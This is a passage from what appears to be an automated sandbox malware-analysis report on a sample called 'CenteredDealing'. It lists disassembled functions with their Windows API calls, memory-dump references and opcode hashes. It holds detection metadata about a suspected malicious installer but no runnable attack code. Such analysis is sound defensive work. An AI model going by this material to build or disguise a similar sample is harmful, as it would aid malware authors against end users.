                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                                                                                                Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                                                                                                                Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                                                                                                                Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                                                                                                • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3394109436-0
                                                                                                                                                                                                                                                                • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                                                                                                                Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                                                                                                                Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                                                                                                                                                Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                                                                                                                                                Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                                                                                                                                                Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                                                                                                                                                Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                                                                                                                                                Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                                                                                                                                                Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
